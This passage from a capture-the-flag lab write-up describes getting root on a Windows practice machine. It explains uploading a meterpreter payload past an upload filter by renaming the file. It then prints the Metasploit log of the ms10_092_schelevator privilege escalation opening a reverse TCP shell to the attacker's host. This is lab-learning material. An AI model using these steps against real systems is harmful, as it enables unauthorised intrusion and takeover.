Now I created a payload to get meterpreter session and uploaded it as shell.exe.config which is allowed by the server and using the web-shell I had, I renamed the file to shell.exe and then ran it.
NOTE: I was not able to find the user.txt flag at first so I just jumped ahead and went for root, however, I had to make the hidden files visible to get the user.txt file, which I realised way too late.
The shell was a x86 shell so I had to upgrade to x64 shell and then run exploit suggester.
msf5exploit(windows/local/payload_inject) >usepost/multi/recon/local_exploit_suggestermsf5post(multi/recon/local_exploit_suggester) >setSESSION2msf5post(multi/recon/local_exploit_suggester) >exploit[*] 10.10.10.93 - Collecting local exploits for x64/windows...[*] 10.10.10.93 - 11 exploit checks are being tried...[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.[*] Post module execution completedmsf5post(multi/recon/local_exploit_suggester) >useexploit/windows/local/ms10_092_schelevatormsf5exploit(windows/local/ms10_092_schelevator) >exploit[*] Started reverse TCP handler on 10.10.14.7:4444[*] Preparing payload at C:\Windows\TEMP\CtBYgVrpsKo.exe[*] Creating task: APiB17mL[*] SUCCESS: The scheduled task "APiB17mL" has successfully been created.[*] SCHELEVATOR[*] Reading the task file contents from C:\Windows\system32\tasks\APiB17mL...[*] Original CRC32: 0xd0da0fc9[*] Final CRC32: 0xd0da0fc9[*] Writing our modified content back...[*] Validating task: APiB17mL[*][*] Folder: \[*] TaskName Next Run Time Status[*] ======================================== ====================== ===============[*] APiB17mL 8/1/2019 8:35:00 PM Ready[*] SCHELEVATOR[*] Disabling the task...[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.[*] SCHELEVATOR[*] Enabling the task...[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.[*] SCHELEVATOR[*] Executing the task...[*] Sending stage (179779bytes) to 10.10.10.93[*] SUCCESS: Attempted to run the scheduled task "APiB17mL".[*] SCHELEVATOR[*] Deleting the task...[*] SUCCESS: The scheduled task "APiB17mL" was successfully deleted.[*] SCHELEVATOR[*] Meterpreter session 3 opened (10.10.14.7:4444 ->10.10.10.93:49159) at 2019-07-18 23:12:11 +0530
Enumerate the web directories and file extensions a little better. Always open up the hidden files on the system as soon as you get a shell to make sure you do not miss anything important.